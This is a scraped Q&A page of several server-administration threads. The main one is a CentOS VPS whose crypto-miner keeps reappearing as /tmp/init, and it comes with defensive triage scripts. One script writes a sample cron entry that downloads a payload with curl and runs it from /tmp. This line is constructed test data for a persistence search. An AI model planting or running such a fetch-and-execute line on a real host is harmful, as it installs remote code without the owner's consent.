Cryptocurrency Malware on CentOS 7 - centos

My VPS server, hosted in Google Cloud, is regularly attacked by cryptocurrency malware.
It runs from "/tmp/init" and takes all CPU resources.
What I do is kill the process and remove the /tmp/init file.
I don't know how, but after several days /tmp/init appears again and is running.
I have tried to find where it comes from using several rootkit tools such as rkhunter, lynis, chkrootkit and clamav, but nothing is found and all configuration is OK.
There are 3 ports open to the outside world:
80 (Apache web server), 20 (only accepts a private key, no root login) and 8983 (Apache Solr)
Are there any good tools to find the cause, or is there any way to prevent this from happening?
Thank you
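The rootkit scanners named above look for known kernel hooks and trojaned system binaries; a user-space miner dropped into /tmp with a cron or service entry to re-launch it is not what they detect. What answers "where does it come from" is the live process itself (its parent chain, real binary and sockets) and a search of the usual persistence locations for the dropper path. The script below is an added example, not code from the original post; it assumes a Linux /proc, GNU grep, and it builds its own constructed cron-like tree (make_sample_persistence) so the search helper can be exercised on a clean machine.

```bash
#!/usr/bin/env bash
# Triage helpers for a miner that keeps coming back as /tmp/init on CentOS 7.
# Added example, not code from the original post. The tree created by
# make_sample_persistence is constructed test data, not a real infection.
set -u

# Walk the parent chain of a PID through /proc. The chain shows what spawned
# the sample: crond, the Solr JVM, an sshd session, a systemd unit, ...
parent_chain() {
  local pid="$1" chain="" comm ppid
  while [ "$pid" -gt 1 ] && [ -r "/proc/$pid/status" ]; do
    comm=$(awk '/^Name:/{print $2}' "/proc/$pid/status")
    ppid=$(awk '/^PPid:/{print $2}' "/proc/$pid/status")
    [ -n "$ppid" ] || break
    chain="${chain}${chain:+ <- }${comm}(${pid})"
    pid="$ppid"
  done
  printf '%s\n' "$chain"
}

# Record the facts about a live process that vanish once it is killed and the
# file removed: the real binary, argv, cwd, parent chain and open sockets.
describe_pid() {
  local pid="$1"
  printf 'exe:  %s\n' "$(readlink "/proc/$pid/exe" 2>/dev/null)"
  printf 'cwd:  %s\n' "$(readlink "/proc/$pid/cwd" 2>/dev/null)"
  printf 'argv: %s\n' "$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)"
  printf 'tree: %s\n' "$(parent_chain "$pid")"
  # /proc/PID/exe still resolves after the file on disk was unlinked, so keep
  # a copy of the binary (and its hash) for analysis before killing it.
  if cp "/proc/$pid/exe" "/root/miner-sample-$pid" 2>/dev/null; then
    sha256sum "/root/miner-sample-$pid"
  fi
  ls -l "/proc/$pid/fd" 2>/dev/null | grep -E 'socket|deleted' || true
}

# List every file under the given persistence locations that mentions the
# dropper path. Sorted, so the result can be compared with an expectation.
persistence_refs() {
  local needle="$1"; shift
  grep -rIl -- "$needle" "$@" 2>/dev/null | LC_ALL=C sort
}

# Build a constructed cron-like tree with two planted entries (203.0.113.5 is
# a documentation address), so the helper can be exercised on a clean host.
make_sample_persistence() {
  local root="$1"
  mkdir -p "$root/cron.d" "$root/spool"
  printf '0 * * * * root /usr/bin/updatedb\n' > "$root/cron.d/mlocate"
  printf '*/5 * * * * root curl -s http://203.0.113.5/init -o /tmp/init && /tmp/init\n' \
    > "$root/cron.d/sysupdate"
  printf '@reboot /tmp/init\n' > "$root/spool/solr"
  printf '%s\n' "$root"
}

# Where a persistence mechanism usually lands on CentOS 7.
PERSIST_DIRS="/etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily /var/spool/cron /etc/rc.d/rc.local /etc/systemd/system /root/.bashrc /root/.ssh /home"

# Stand-alone use on the affected host:  sudo ./triage.sh --run
if [ "${1:-}" = "--run" ]; then
  for p in $(pgrep -f '^/tmp/init' || true); do describe_pid "$p"; done
  # shellcheck disable=SC2086
  persistence_refs '/tmp/init' $PERSIST_DIRS
  # Which interface each service listens on; Solr on 8983 is the one to look at.
  ss -lntp
fi
```

Run it while the miner is still alive, before killing anything: once the process is gone the parent chain and the unlinked binary are gone with it. If the chain ends in the Solr JVM or a cron entry owned by the solr user, the entry point is the 8983 port that is open to the world, and the fix is to bind Solr to localhost or firewall the port rather than to keep deleting /tmp/init. Killing the process first and removing the file second is the right order either way, since a running process can simply write the file back.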

Related

How to Confirm PostgreSQL on Ubuntu VM is communicating with External Server for Updates

I have an Ubuntu VM installed on a client's VMware system. Recently, the client's IT informed us that his firewall has been detecting consistent potential port scans to our VM's internal IP address (coming from 87.238.57.227). He asked if this was part of a known package update process on our VM.
He sent us a firewall output where we can see several instances of the port scan, but there are also instances of our Ubuntu VM trying to communicate back to the external server on port 37258 (this is dropped by the firewall).
Based on a Google lookup, the hostname of the external IP address is "feris.postgresql.org", with the ASN pointing to a European company called Redpill-Linpro. As far as I can tell, they offer IT consulting services, specializing in open source software (like PostgreSQL, which is installed on our VM). I have never heard of them before though and have no idea why our VM would be communicating with them or vice versa. I'm also not sure if I'm interpreting the IP lookup information correctly: https://ipinfo.io/87.238.57.227
I'm looking for a way to confirm or disprove that this is just our VM pinging for a standard postgres update. If that's the case I'd like to restrict this behaviour. We would prefer to do these types of updates manually and limit the communication outside of the VM to what is strictly necessary for the functionality of our application.
Update
I sent an email to Redpill's abuse account. They responded quickly saying that the server should not be port scanning anyone and if it appears that way, something is wrong.
The server is part of a cluster of machines that serves apt.postgresql.org among other postgres download sites. I don't think we have anything like ansible or puppet installed that would automatically check for updates but I will look into that to make sure. I'm wondering if Ubuntu reaching out to update the MOTD with the number of available packages would explain why our VM is trying to reach out to the external postgres server?
The abuse rep said in any case there should only be outgoing connections from the VM, not incoming. He asked for some additional info so I will keep communicating with him and try to update this post accordingly
My communication with the client's IT dropped off so I did not get a definitive answer on this, but I'll provide some new details:
I reached out to the abuse email for Redpill-Linpro. He got back to me and confirmed the server corresponding to the detected IP address is part of a cluster that hosts postgres download sites, including apt.postgresql.org. He was surprised to learn we had detected a port scan from their server and seems eager to figure out why that is happening.
He asked if the client IT could pass along some necessary info for them to set up tracking on that server. But the client IT never got back to me. I think he was satisfied that it wasn't malicious and stopped pursuing it.
Here's one of the messages the abuse rep sent me that may be relevant:
That does look a lot like the tcp to the apt download server yes. It's
strange that your firewall reports that many incoming connections, but
they could be fallout from some connection tracking that's not
operating as intended. The timing appears to be matching up more or
less perfectly. And there should definitely not be any ping-back
connections from it.
Since you appear to be using the http version of the server (and not https) bringing the data in cleartext, they should be able to just
dump the TCP connection contents and verify exactly what it does. But
I bet they are going to see a number of http requests initiated by the
apt client that is checking for updates.
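To confirm the abuse rep's reading on the VM itself, the first thing to establish is whether apt.postgresql.org is actually configured as a package source, and whether that entry uses http (which is what makes the traffic capturable in cleartext) or https. The script below is an added example, not part of the question or the rep's message; it parses sources.list-style lines and carries a constructed sample so it runs offline, and the `--system` mode assumes the standard Ubuntu paths /etc/apt/sources.list, /etc/apt/sources.list.d/ and the apt-daily systemd timers.

```bash
#!/usr/bin/env bash
# Added example (not from the original question): list which hosts apt on the
# VM is configured to contact and over which scheme, so an outbound connection
# to apt.postgresql.org can be matched to a local source entry.
set -u

# Read sources.list-style lines (files as arguments, or stdin) and print
# "scheme host" for each deb/deb-src entry, skipping comments and the
# optional [options] bracket. Output is de-duplicated and sorted.
apt_hosts() {
  awk '
    /^[ \t]*#/ || NF == 0 { next }
    $1 == "deb" || $1 == "deb-src" {
      i = 2
      if ($i ~ /^\[/) { while (i <= NF && $i !~ /\]$/) i++; i++ }
      url = $i
      if (split(url, parts, "://") == 2) {
        host = parts[2]; sub(/[\/:].*/, "", host)
        print parts[1], host
      }
    }' "$@" | LC_ALL=C sort -u
}

# Of those, the entries that would be fetched in cleartext (plain http).
cleartext_hosts() {
  apt_hosts "$@" | awk '$1 == "http" { print $2 }'
}

# Constructed sample resembling /etc/apt/sources.list plus a PGDG list file.
SAMPLE_SOURCES='# Ubuntu main
deb http://archive.ubuntu.com/ubuntu focal main restricted
deb-src http://archive.ubuntu.com/ubuntu focal main restricted
deb [arch=amd64 signed-by=/usr/share/keyrings/pgdg.gpg] http://apt.postgresql.org/pub/repos/apt focal-pgdg main
deb https://packages.microsoft.com/repos/code stable main
'

# Stand-alone use on the VM:  ./apt-hosts.sh --system
if [ "${1:-}" = "--system" ]; then
  echo "== configured hosts (scheme host) =="
  apt_hosts /etc/apt/sources.list /etc/apt/sources.list.d/*.list
  echo "== timers that trigger apt traffic without a login =="
  systemctl list-timers 'apt-daily*' --all 2>/dev/null || true
else
  printf '%s' "$SAMPLE_SOURCES" | cleartext_hosts
fi
```

If apt.postgresql.org shows up with scheme http, the client IT can verify the content exactly as the rep suggests (`tcpdump -nn -i any host 87.238.57.227 and port 80`) and should see plain HTTP GETs for Release and Packages files. Switching that source line to https removes the cleartext exposure; disabling the `apt-daily.timer` and `apt-daily-upgrade.timer` units (`systemctl disable --now ...`) stops the periodic checks so that updates happen only when run manually, which is what the question asks for. Neither change explains inbound scans from that address, which is the part the rep also could not account for.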

Cannot open files in FileMaker Server 19(message: The host's capacity was exceeded)

I am just starting out with FileMaker and have run into a problem with FileMaker Server 19. I have a client file that I have shared with the server which is showing up as expected in the FMS Admin console under the Databases tab. However, when I try to open it to make it active in FM Server, it won't open.
The only message I receive is that the host's capacity has been exceeded, which doesn't make sense since it is a fresh install and no clients have been hosted yet.
I have looked around online to try to find a solution but haven't found anything that works. Most solutions refer to the number of simultaneous clients permitted by FM Server.
Any help is much appreciated.

Possible reasons why my shadowsocks not working on virmach's server?

I'm a newcomer to using overseas servers. Recently I bought a VPS from virmach in order to see foreign websites like google and wiki.
I've been trying for a long time to configure shadowsocks on my server.
However, when I used shadowsocks-qt5 to connect to my server, it timed out.
And of course I can't access google correctly.
What I want to ask is the reason why I failed.
Here are the things I remember doing:
stop the firewall on both computers;
build the .json file, following blogs in China.
Here is the outline of my shadowsocks.json on my server:
{
"server":"0.0.0.0",
"server_port":8388,
"local_address":"127.0.0.1",
"local_port":1080,
"password":"XXXX",
"timeout":600,
"method":"aes-256-cfb"
}
Other useful (maybe) information:
my client OS version: Ubuntu 18.04.3 LTS
my server OS version: Ubuntu 16.04.6 LTS
the client I choose is from: https://github.com/shadowsocks/shadowsocks-qt5
I could not help but wonder, are there any other possible reasons I've forgotten? Can anyone give me some helpful details to solve this puzzling problem? Thanks a lot!
I have not set up my own VPS but have instead subscribed to the server provided by caonima.io, so I can't speak for any server-related issues. Additionally, I have no affiliation with caonima.io. I did however successfully set up my client on Ubuntu 16.04 after having some issues connecting to GFW-blocked (China's Great Firewall) websites.
From what I understand from my solution, the client configuration is NOT the only step of setup. There are two layers of proxy access that need to be completed:
Client Configuration. Configure your client with the server and connection information. A successful connection looked like this for me with my command-line interface:
[screenshot: shadowsocks-libev command-line client showing a successful connection]
System or Browser Proxy Configuration. You will need to configure either your browser or web access tool to use a proxy, or set system-wide proxy settings. To set system wide proxy settings, go to system settings > network > network proxy and enter the proxy information. Setting Socks host to localhost:1080 resulted in successful GFW-blocked website access (as shown below)!
[screenshot: Ubuntu network settings, manual proxy configuration]

JBoss VPS External ip settings - working fine in local browser but not in external

Beforehand I have to say I'm a bit of a newbie.
I've subscribed to a VPS with Ubuntu 11.04 server, installed JBoss and am starting it with the -b 0.0.0.0 option.
Now if I look up the address ip:8080 in a browser on the VPS itself it works fine, but if I try to look it up in a browser on an external machine it isn't able to access the page.
I tried to modify the hosts file but without success. Maybe it's the iptables? Or something else?
I really appreciate any help, thanks.
Take the static IP of the server and ping it from your command-line tool. If you can ping the server successfully you are all set. Now go to the browser of the external PC and type the static IP with port 8080. It will certainly work.
A good suggestion from my side is to try PaaS (platform as a service), as that is much easier than a VPS and you will be up and running in minutes. Try Jelastic. It has JBoss hosting. Deploy your WAR file there and you can access it immediately. Let me know if you really go ahead and use it.
Surya
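"Works in a browser on the VPS, not from outside" has three usual causes that a ping reply cannot distinguish: the service is bound to loopback only, the host firewall (iptables) drops the port, or the provider filters it upstream. ICMP getting through says nothing about TCP 8080. The script below is an added example, not code from the question or the answer above; it classifies how a port is bound from `ss -lnt` style output (constructed samples are included so it runs offline), and its `--check` mode assumes `ss` and `iptables` are available on the host.

```bash
#!/usr/bin/env bash
# Added example (not from the question or answer above): tell the failure
# modes of "works on the VPS, not from outside" apart. The listener output
# used below is constructed; on a real host feed it the output of `ss -lnt`.
set -u

# Read `ss -lnt` / `netstat -lnt` output on stdin and report how PORT is bound:
# "all" (every interface, what -b 0.0.0.0 should give), "loopback" (127.0.0.1
# or ::1 only), "specific <ip>" (one address) or "none" (nothing listening).
listener_scope() {
  awk -v port="$1" '
    {
      for (i = 1; i <= NF; i++)
        if (!found && $i ~ (":" port "$")) {
          found = 1; addr = $i; sub(/:[0-9]+$/, "", addr)
        }
    }
    END {
      if (!found) print "none"
      else if (addr == "*" || addr == "0.0.0.0" || addr == "::" || addr == "[::]") print "all"
      else if (addr == "127.0.0.1" || addr == "::1" || addr == "[::1]") print "loopback"
      else print "specific " addr
    }'
}

# Constructed samples of what `ss -lnt` prints in two of the situations.
SAMPLE_ALL='State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 *:22 *:*
LISTEN 0 50 *:8080 *:*'
SAMPLE_LOOPBACK='LISTEN 0 50 127.0.0.1:8080 *:*'

# Stand-alone use on the VPS:  sudo ./portcheck.sh --check 8080
if [ "${1:-}" = "--check" ]; then
  port="${2:-8080}"
  echo "bind:     $(ss -lnt 2>/dev/null | listener_scope "$port")"
  # Host firewall: every INPUT rule that mentions the port, in evaluation order.
  echo "iptables:"
  iptables -L INPUT -n --line-numbers 2>/dev/null | grep -E "dpt:$port( |$)" \
    || echo "  no INPUT rule mentions port $port"
  # From an outside machine, test the TCP port itself rather than ping:
  #   nc -zv -w3 <static-ip> 8080
else
  printf '%s\n' "$SAMPLE_ALL" | listener_scope 8080
fi
```

Reading the result: "loopback" means the -b 0.0.0.0 option is not reaching JBoss (check the start script); "all" with no ACCEPT rule for the port on a host whose INPUT policy is DROP means iptables is the culprit (`iptables -I INPUT -p tcp --dport 8080 -j ACCEPT` to test, then make it persistent); "all" with an ACCEPT rule and still no outside access points at the provider's firewall or control panel. Editing the hosts file only affects name resolution on the VPS and cannot help with a connection made by IP.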

Intranet website with Joomla?

My company wants to set up a small intranet portal on the LAN. We are about 100 users at most. I am thinking about Joomla on a Windows server environment with XAMPP.
Just to be safe, is XAMPP efficient for serving about 50 to 100 users? Does it have connection limits? Also, how about using it as a web server for a small intranet portal?
Have your say guys.
XAMPP is "just" a collection of established applications for serving web pages. The underlying Apache can handle far more than the expected 100 users.
I haven't tried it yet, but think that maybe even the out-of-the-box configuration might be sufficient; if not, you can always modify the underlying Apache and/or MySQL database according to your needs.
XAMPP is just a handy single-click installer for Apache/MySQL/PHP which is all you need to run Joomla. This stack powers some of the largest websites on the net, so I don't think you'll run into any problems there. The specs of the server are what you should be most concerned about, but any low-range server should be able to handle that capacity without blinking.
Just be aware that the default settings used by XAMPP are specifically designed for developers working on their own local machines: there's no root password for MySQL, permissions are very relaxed, etc. Take some time to go through the config after you set it up.
You could also look at WAMP, depending on your requirements. Similar sort of thing but with the same issues that nickf stated.